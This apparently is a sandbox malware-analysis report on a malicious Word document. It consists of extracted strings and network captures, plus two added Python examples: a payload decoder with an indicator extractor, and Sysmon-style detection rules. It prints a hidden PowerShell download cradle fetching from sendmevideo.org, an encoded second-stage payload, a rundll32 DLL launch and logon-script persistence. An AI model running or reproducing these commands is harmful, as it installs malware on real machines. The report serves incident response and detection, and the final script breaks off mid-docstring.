0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE
Ansi based on Dropped File (~WRD0000.tmp)
1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%
Ansi based on Dropped File (~WRD0000.tmp)
5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2
Ansi based on Dropped File (~WRD0000.tmp)
6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht
Ansi based on Dropped File (~WRD0000.tmp)
7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE
Ansi based on Dropped File (~WRD0000.tmp)
9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS
Ansi based on Dropped File (~WRD0000.tmp)
<h1>Not Found</h1>The requested URL // was not found on this server.
Ansi based on Dropped File (VRzZ5.vnd[1].txt)
='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~
Ansi based on Dropped File (~WRD0000.tmp)
=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+
Ansi based on Dropped File (~WRD0000.tmp)
=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.
Ansi based on Dropped File (~WRD0000.tmp)
>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,
Ansi based on Dropped File (~WRD0000.tmp)
>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET
Ansi based on Dropped File (~WRD0000.tmp)
?_O-~\Tn`z&{(
Ansi based on PCAP Processing (network.pcap)
@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&
Ansi based on Dropped File (~WRD0000.tmp)
@Batang
Unicode based on Runtime Data (WINWORD.EXE )
@BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DAD29B0][O00000000]*C:\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
Unicode based on Runtime Data (WINWORD.EXE )
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
Ansi based on Process Commandline (00040970-00001420)
\JeL{Q*Fj[q]SIrK+\ri+^%%J@{G3r?hR[ozb4f@/^Uc""P|}~6}1oV:DHp*;\)4{uw%n0,vB9)MbdY:]}0,N%d7I 4PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0002.tmp)
\JeL{QJ*[r]SI2%x.MHNRtfgV@
Ansi based on Dropped File (~WRD0000.tmp)
]3j%L]CBr#7@>KVkZ^-d ukW.+"p!
Ansi based on Dropped File (~WRD0000.tmp)
^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!
Ansi based on Dropped File (~WRD0000.tmp)
^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc
Ansi based on Dropped File (~WRD0000.tmp)
_::_::_
Ansi based on Image Processing (screen_3.png)
_;-_'_-_'',_'t-_-,t-_-,
Ansi based on Image Processing (screen_3.png)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
android.clients.google.com
Ansi based on PCAP Processing (network.pcap)
android.com
Ansi based on PCAP Processing (network.pcap)
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
Ansi based on PCAP Processing (network.pcap)
Batang
Unicode based on Runtime Data (WINWORD.EXE )
BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Poster Compressed
Unicode based on Runtime Data (WINWORD.EXE )
Brush Script MT
Unicode based on Runtime Data (WINWORD.EXE )
bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV
Ansi based on Dropped File (~WRD0000.tmp)
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a
Ansi based on Process Commandline (powershell.exe)
c==/6g b&*+Qb]bw*N3#_tgK}BVQ~>\'!`"7/e}x ]\+`J)nGOt:_NIW2^cU'd%#[){?PK!EOMword/fontTable.xmlj0K{2uJ6>XF7o f~f>kQU/%INU>~xVV+d`CY+m'i)M\LYPVwpv/q}wK3[3YlFVqdcG`/k(|jbg]tFNN8c(LEY-r8i68VPqNd\B@lQ=44@78Ug-^fVrlj|`c'
Ansi based on Dropped File (~WRD0000.tmp)
Comic Sans MS
Unicode based on Runtime Data (WINWORD.EXE )
CompanyName
Unicode based on Dropped File (carved_0.dll.1509628513544)
CreateMutexA
Ansi based on PCAP Processing (network.pcap)
CreateRemoteThread
Ansi based on PCAP Processing (network.pcap)
CryptBinaryToStringA
Ansi based on PCAP Processing (network.pcap)
CryptStringToBinaryA
Ansi based on PCAP Processing (network.pcap)
d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk
Ansi based on Dropped File (~WRD0000.tmp)
DefaultConnectionSettings
Unicode based on Runtime Data (rundll32.exe )
developer.android.google.cn
Ansi based on PCAP Processing (network.pcap)
developers.android.google.cn
Ansi based on PCAP Processing (network.pcap)
DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?
Ansi based on Dropped File (~WRD0000.tmp)
Edwardian Script ITC
Unicode based on Runtime Data (WINWORD.EXE )
FileDescription
Unicode based on Dropped File (carved_0.dll.1509628513544)
FileVersion
Unicode based on Dropped File (carved_0.dll.1509628513544)
Freestyle Script
Unicode based on Runtime Data (WINWORD.EXE )
French Script MT
Unicode based on Runtime Data (WINWORD.EXE )
Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7
Ansi based on Dropped File (~WRD0000.tmp)
g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv
Ansi based on Dropped File (~WRD0000.tmp)
G_)Ew_9_8]ROu!}=I]?re
Ansi based on Dropped File (~WRD0000.tmp)
GdipGetImageEncoders
Ansi based on PCAP Processing (network.pcap)
GdipGetImageEncodersSize
Ansi based on PCAP Processing (network.pcap)
GdipSaveImageToStream
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!
Ansi based on PCAP Processing (network.pcap)
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1Cache-Control: max-age = 86405Connection: Keep-AliveAccept: */*If-Modified-Since: Sat, 12 Nov 2016 01:34:12 GMTIf-None-Match: "02e4de843cd21:0"User-Agent: Microsoft-CryptoAPI/6.1Host: www.download.windowsupdate.com0
Ansi based on PCAP Processing (network.pcap)
GetAdaptersAddresses
Ansi based on PCAP Processing (network.pcap)
GetCurrentProcess
Ansi based on PCAP Processing (network.pcap)
GetExitCodeP!
Ansi based on PCAP Processing (network.pcap)
GetExitCodeProcess
Ansi based on Dropped File (carved_0.dll.1509628513544)
GetExitCodeThread
Ansi based on PCAP Processing (network.pcap)
GetFileSize
Ansi based on PCAP Processing (network.pcap)
GetLastError
Ansi based on PCAP Processing (network.pcap)
GetMessageA
Ansi based on PCAP Processing (network.pcap)
GetModuleHandleA
Ansi based on PCAP Processing (network.pcap)
GetPrivateProfileStringW
Ansi based on PCAP Processing (network.pcap)
GetProcAddress
Ansi based on PCAP Processing (network.pcap)
GetProcessHeap
Ansi based on PCAP Processing (network.pcap)
GetSystemInfo
Ansi based on PCAP Processing (network.pcap)
GetSystemMetrics
Ansi based on PCAP Processing (network.pcap)
GetSystemTimeAsFileTime
Ansi based on PCAP Processing (network.pcap)
GetTickCount
Ansi based on PCAP Processing (network.pcap)
GetVersionExA
Ansi based on PCAP Processing (network.pcap)
GetVolumeInformationW
Ansi based on PCAP Processing (network.pcap)
google-analytics.com
Ansi based on PCAP Processing (network.pcap)
google.com
Ansi based on PCAP Processing (network.pcap)
googlecommerce.com
Ansi based on PCAP Processing (network.pcap)
h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\
Ansi based on Dropped File (~WRD0000.tmp)
h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')
Ansi based on Dropped File (~WRD0000.tmp)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 11:35:21 GMTContent-Type: application/vnd.ms-cab-compressedContent-Length: 53978Connection: keep-aliveCache-Control: max-age=604800ETag: "014e8acee33d31:0"Expires: Tue, 07 Nov 2017 11:35:20 GMTLast-Modified: Fri, 22 Sep 2017 22:03:52 GMTServer: Microsoft-IIS/8.5MSRegion: EMEAx-ccc: FRx-cid: 3X-Powered-By: ASP.NETAge: 5687Accept-Ranges: bytesMSCF
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:40 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 12:13:53 GMTETag: "7f0-55cd6b0447ebb"Accept-Ranges: bytesContent-Length: 2032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plain; charset=UTF-8JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAHAAPQAoACQARQBuAHYAOgBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQArACIAXABtAHYAZAByAHQALgBkAGwAbAAiACkAOwANAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAFcALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAbgBkAG0AZQB2AGkAZABlAG8ALgBvAHIAZwAvAGQAaAAyADAAMgA1AGUALwBlAGgALgBkAGwAbAAiACwAJABwACkAOwANAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApAHsADQAKACQAcgBkAF8AcAA9ACQARQBuAHYAOgBTAFkAUwBUAEUATQBSAE8ATwBUACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwANAAoAJABwAF8AYQA9ACQAcAArACIALAAjADEAIgA7AA0ACgAkAHAAcgA9AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHIAZABfAHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABwAF8AYQA7AA0ACgAkAHAAXwBiAGEAdAA9ACgAJABFAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFACsAIgBcAG0AdgBkAHIAdAAuAGIAYQB0ACIAKQA7AA0ACgAkAHQAZQB4AHQAPQAnAHMAZQB0ACAAaQBuAHMAdABfAHAAYwBrACAAPQAgACIAJQBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEw
Ansi based on PCAP Processing (network.pcap)
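The base64 text in the HTTP 200 body above is the second stage that the WINWORD.EXE-spawned command line (`powershell ... -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e`) hands to `-enc`: base64 over UTF-16LE PowerShell text, not plain ASCII. The Python below is an added example, not part of the sandbox report. It embeds the blob exactly as the PCAP strings show it, decodes it, and pulls out the indicators a responder needs. The captured copy is cut off (the server reported 2032 bytes), so the decoder tolerates a truncated tail instead of raising. The fragment recovered from powershell.exe memory, which carries the `UserInitMprLogonScript` persistence step the PCAP copy is missing, is embedded as well, copied from the report's process command-line strings. The function names (`decode_encoded_command`, `extract_iocs`, `payload_is_truncated`) and the IOC dictionary layout are this example's own.

```python
"""Decode the second-stage PowerShell that sendmevideo.org returned for
/dh2025e/eee.txt and pull indicators out of it.
Added example; not part of the sandbox report."""
import base64
import re

# Body of the HTTP 200 for /dh2025e/eee.txt, copied from the report's PCAP
# strings. The capture stops mid-script; the real response was 2032 bytes.
EEE_TXT_BODY = (
    "JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQA"
    "LgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAHAAPQAoACQARQBuAHYAOgBBAEwA"
    "TABVAFMARQBSAFMAUABSAE8ARgBJAEwARQArACIAXABtAHYAZAByAHQALgBkAGwA"
    "bAAiACkAOwANAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMA"
    "ZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUA"
    "cgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIA"
    "YQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAFcALgBEAG8AdwBuAGwA"
    "bwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAbgBkAG0AZQB2AGkA"
    "ZABlAG8ALgBvAHIAZwAvAGQAaAAyADAAMgA1AGUALwBlAGgALgBkAGwAbAAiACwA"
    "JABwACkAOwANAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApAHsA"
    "DQAKACQAcgBkAF8AcAA9ACQARQBuAHYAOgBTAFkAUwBUAEUATQBSAE8ATwBUACsA"
    "IgBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIA"
    "OwANAAoAJABwAF8AYQA9ACQAcAArACIALAAjADEAIgA7AA0ACgAkAHAAcgA9AFMA"
    "dABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHIAZABfAHAAIAAtAEEAcgBnAHUA"
    "bQBlAG4AdABMAGkAcwB0ACAAJABwAF8AYQA7AA0ACgAkAHAAXwBiAGEAdAA9ACgA"
    "JABFAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFACsAIgBcAG0A"
    "dgBkAHIAdAAuAGIAYQB0ACIAKQA7AA0ACgAkAHQAZQB4AHQAPQAnAHMAZQB0ACAA"
    "aQBuAHMAdABfAHAAYwBrACAAPQAgACIAJQBBAEwATABVAFMARQBSAFMAUABSAE8A"
    "RgBJAEw"
)

# Fragment of the same script as recovered from powershell.exe memory in the
# report; it holds the persistence step the PCAP copy is missing.
MEMORY_FRAGMENT = (
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
    "if (Test-Path $p){ $rd_p='%WINDIR%\\+\"\\System32\\rundll32.exe\""
    "New-ItemProperty -Path 'HKCU:\\Environment' -Name 'UserInitMprLogonScript' "
    "-Value \"$p_bat\" -PropertyType String -Force | Out-Null;"
)


def payload_is_truncated(blob: str) -> bool:
    """A complete -enc argument is always a multiple of 4 base64 characters."""
    return len(re.sub(r"\s+", "", blob)) % 4 != 0


def decode_encoded_command(blob: str) -> str:
    """Decode a `powershell -enc` payload: base64 over UTF-16LE text.

    Tolerates a truncated capture: a lone leftover base64 character (which
    cannot encode a whole byte) is dropped, missing '=' padding is restored,
    and a dangling half code unit at the end is ignored.
    """
    s = re.sub(r"\s+", "", blob)
    if len(s) % 4 == 1:
        s = s[:-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("utf-16-le", errors="ignore")


def extract_iocs(script: str) -> dict:
    """Pull the indicators a responder wants from the decoded stage."""
    # $Env:VAR+"\file" -> %VAR%\file, the way the script builds its drop paths
    paths = [f"%{var}%\\{rest}" for var, rest in
             re.findall(r'\$Env:([A-Za-z_]+)\+"\\([^"]+)"', script)]
    return {
        "urls": re.findall(r"https?://[^\s\"'),;]+", script),
        "paths": paths,
        # rundll32 <dll>,#N loads the DLL and calls export ordinal N
        "rundll32_ordinals": re.findall(r'",#(\d+)"', script),
        # a {$true} callback accepts any TLS certificate the C2 presents
        "tls_validation_disabled": ("ServerCertificateValidationCallback" in script
                                    and "{$true}" in script),
        # HKCU\Environment\UserInitMprLogonScript runs at every logon (ATT&CK T1037.001)
        "logon_script_persistence": "UserInitMprLogonScript" in script,
    }


if __name__ == "__main__":
    stage2 = decode_encoded_command(EEE_TXT_BODY)
    print(stage2)
    print("truncated capture:", payload_is_truncated(EEE_TXT_BODY))
    print(extract_iocs(stage2))
    print("persistence in memory copy:",
          extract_iocs(MEMORY_FRAGMENT)["logon_script_persistence"])
```

The decoded stage reads, in order: create a WebClient, set `$p` to `$Env:ALLUSERSPROFILE\mvdrt.dll`, disable certificate validation, download `eh.dll` to `$p`, and if that succeeded start `rundll32.exe $p,#1` and begin writing `mvdrt.bat`; the capture ends inside the batch-file text. Because the truncation falls mid-character, the last code unit is dropped rather than guessed, which is the right behaviour for evidence: report what was captured, not what was probably there.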
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:46 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 13:16:40 GMTETag: "7e00-55cd790d0d6eb"Accept-Ranges: bytesContent-Length: 32256Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamMZ
Ansi based on PCAP Processing (network.pcap)
http://clients1.google.com/ocsp0
Ansi based on PCAP Processing (network.pcap)
http://g.symcd.com0
Ansi based on PCAP Processing (network.pcap)
http://pki.google.com/GIAG2.crl0
Ansi based on PCAP Processing (network.pcap)
http://pki.google.com/GIAG2.crt0+
Ansi based on PCAP Processing (network.pcap)
HttpOpenRequestA
Ansi based on PCAP Processing (network.pcap)
HttpQueryInfoA
Ansi based on PCAP Processing (network.pcap)
HttpSendRequestA
Ansi based on PCAP Processing (network.pcap)
i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+
Ansi based on Dropped File (~WRD0000.tmp)
IETldDllVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldDllVersionLow
Unicode based on Runtime Data (rundll32.exe )
IETldVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldVersionLow
Unicode based on Runtime Data (rundll32.exe )
if NOT exist %inst_pck % (exit)
Ansi based on Dropped File (mvdrt.bat)
Informal Roman
Unicode based on Runtime Data (WINWORD.EXE )
IrisUPC
Unicode based on Runtime Data (WINWORD.EXE )
IsWow64Process
Ansi based on PCAP Processing (network.pcap)
J(6-!FnBPFb2y(R1"I2OxfT#L
Ansi based on Dropped File (~WRD0000.tmp)
j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+
Ansi based on Dropped File (~WRD0000.tmp)
j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv
Ansi based on Dropped File (~WRD0000.tmp)
Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^
Ansi based on Dropped File (~WRD0000.tmp)
Kunstler Script
Unicode based on Runtime Data (WINWORD.EXE )
l_____:,_---_---_
Ansi based on Image Processing (screen_3.png)
LastPurgeTime
Unicode based on Runtime Data (WINWORD.EXE )
LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj
Ansi based on Dropped File (~WRD0000.tmp)
LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk
Ansi based on Dropped File (~WRD0000.tmp)
Matura MT Script Capitals
Unicode based on Runtime Data (WINWORD.EXE )
mspim_wnd32
Unicode based on Runtime Data (WINWORD.EXE )
O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO
Ansi based on Dropped File (~WRD0000.tmp)
oductVersion
Unicode based on Dropped File (carved_0.dll.1509628513544)
Palace Script MT
Unicode based on Runtime Data (WINWORD.EXE )
PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi
Ansi based on Dropped File (~WRD0000.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!=lgt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0002.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0000.tmp)
Process32First
Ansi based on PCAP Processing (network.pcap)
Process32Next
Ansi based on PCAP Processing (network.pcap)
R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX
Ansi based on Dropped File (~WRD0000.tmp)
RegCloseKey
Ansi based on PCAP Processing (network.pcap)
RegCreateKeyExA
Ansi based on PCAP Processing (network.pcap)
RegOpenKeyExA
Ansi based on PCAP Processing (network.pcap)
RegQueryValueExA
Ansi based on PCAP Processing (network.pcap)
RegSetValueExA
Ansi based on PCAP Processing (network.pcap)
S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!To^=word/stylesWithEffects.xmlmS8}CHp4P3m60Z|~ pV;wc]Wa<$2Z'}=,GNg}%tx>,=TcO^O2'-NhW,zb[d#`e,=$dceb%\yCj8T(G$(pk!2M$<dnDPkt+0(u=Aa`AwIW0EF9ljaH}Id[wb1MhmeI\jh)@c.7,zH&lG*}RKYd&YFYl,+_/T
Ansi based on Dropped File (~WRD0000.tmp)
satellitedeluxpanorama.com
Ansi based on PCAP Processing (network.pcap)
satellitedeluxpanorama.com0
Ansi based on PCAP Processing (network.pcap)
Script MT Bold
Unicode based on Runtime Data (WINWORD.EXE )
Segoe Script
Unicode based on Runtime Data (WINWORD.EXE )
sendmevideo.org
Ansi based on PCAP Processing (PCAP)
ServicesActive
Unicode based on Runtime Data (rundll32.exe )
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"
Ansi based on Dropped File (mvdrt.bat)
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
SetLastError
Ansi based on PCAP Processing (network.pcap)
SHGetSpecialFolderPathW
Ansi based on PCAP Processing (network.pcap)
source.android.google.cn
Ansi based on PCAP Processing (network.pcap)
start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
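Read together, the strings give the whole chain: WINWORD.EXE starts a hidden, profile-less powershell.exe that fetches eee.txt with DownloadString and passes it to a second powershell.exe through `-enc`; that stage drops eh.dll as `%ALLUSERSPROFILE%\mvdrt.dll`, runs it with `rundll32.exe <dll>,#1` (export ordinal 1), and writes `mvdrt.bat` (the `set inst_pck` / `if NOT exist` / `start rundll32.exe` lines above) plus the `HKCU\Environment\UserInitMprLogonScript` value so the batch file reruns the DLL at every logon. The Python below is an added detection example, not the report's own content: it scores Sysmon-style process-creation and registry-set records for those stages. The records are constructed from the report's command lines; the concrete drop paths assume `%ALLUSERSPROFILE%` resolves to `C:\ProgramData`, the `-enc` blob is shortened, and the rule names are this example's own. Note that it matches on the resolved image name rather than the literal launcher path: the report's path is `C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, whose `..` components are collapsed before the file is opened, so a rule keyed on an Office directory prefix would miss it.

```python
"""Flag the chain this report shows (Office -> hidden PowerShell download cradle
-> powershell -enc -> rundll32 <dll>,#N -> UserInitMprLogonScript) in
Sysmon-style events. Added example; the events are constructed, not real logs."""
import re

# Constructed records modelled on Sysmon Event ID 1 (ProcessCreate) and 13
# (RegistryEvent SetValue). Paths assume %ALLUSERSPROFILE% = C:\ProgramData.
EVENTS = [
    {"id": 1, "type": "ProcessCreate", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmd": 'powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient)'
            ".DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e"},
    {"id": 2, "type": "ProcessCreate", "parent": "powershell.exe", "image": "powershell.exe",
     "cmd": "powershell -enc JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBz"},  # blob shortened
    {"id": 3, "type": "ProcessCreate", "parent": "powershell.exe", "image": "rundll32.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" C:\ProgramData\mvdrt.dll,#1'},
    {"id": 4, "type": "RegistrySet", "image": "powershell.exe",
     "target": r"HKCU\Environment\UserInitMprLogonScript",
     "details": r"C:\ProgramData\mvdrt.bat"},
    # benign control: an admin script started from Explorer, no cradle, no encoding
    {"id": 5, "type": "ProcessCreate", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Unrestricted -File C:\scripts\inventory.ps1"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE = re.compile(r"(?i)(?:DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIEX\b)")
HIDDEN = re.compile(r"(?i)-W(?:indowStyle)?\s+Hidden")
# powershell.exe accepts -e, -ec, -en, -enc and the full switch for -EncodedCommand;
# the argument must look like base64, so "-ExecutionPolicy Unrestricted" does not fire
ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")
ORDINAL = re.compile(r",#\d+(?:\s|$)")  # rundll32 <dll>,#N calls export ordinal N


def rules_for(ev: dict) -> list:
    """Return the rule names one event trips, in a fixed order."""
    hits = []
    if ev["type"] == "ProcessCreate":
        cmd = ev["cmd"]
        if ev["parent"].lower() in OFFICE and ev["image"].lower() == "powershell.exe":
            hits.append("office_spawns_powershell")
        if CRADLE.search(cmd):
            hits.append("download_cradle")
        if HIDDEN.search(cmd):
            hits.append("hidden_window")
        if ENCODED.search(cmd):
            hits.append("encoded_command")
        if ev["image"].lower() == "rundll32.exe" and ORDINAL.search(cmd):
            hits.append("rundll32_ordinal_export")
    elif ev["type"] == "RegistrySet":
        if ev["target"].lower().endswith(r"\environment\userinitmprlogonscript"):
            hits.append("logon_script_persistence")
    return hits


def evaluate(events: list) -> dict:
    """Map event id -> rules tripped."""
    return {ev["id"]: rules_for(ev) for ev in events}


def verdict(events: list) -> str:
    """Combine stages: delivery (Office -> PowerShell with a cradle or -enc) plus
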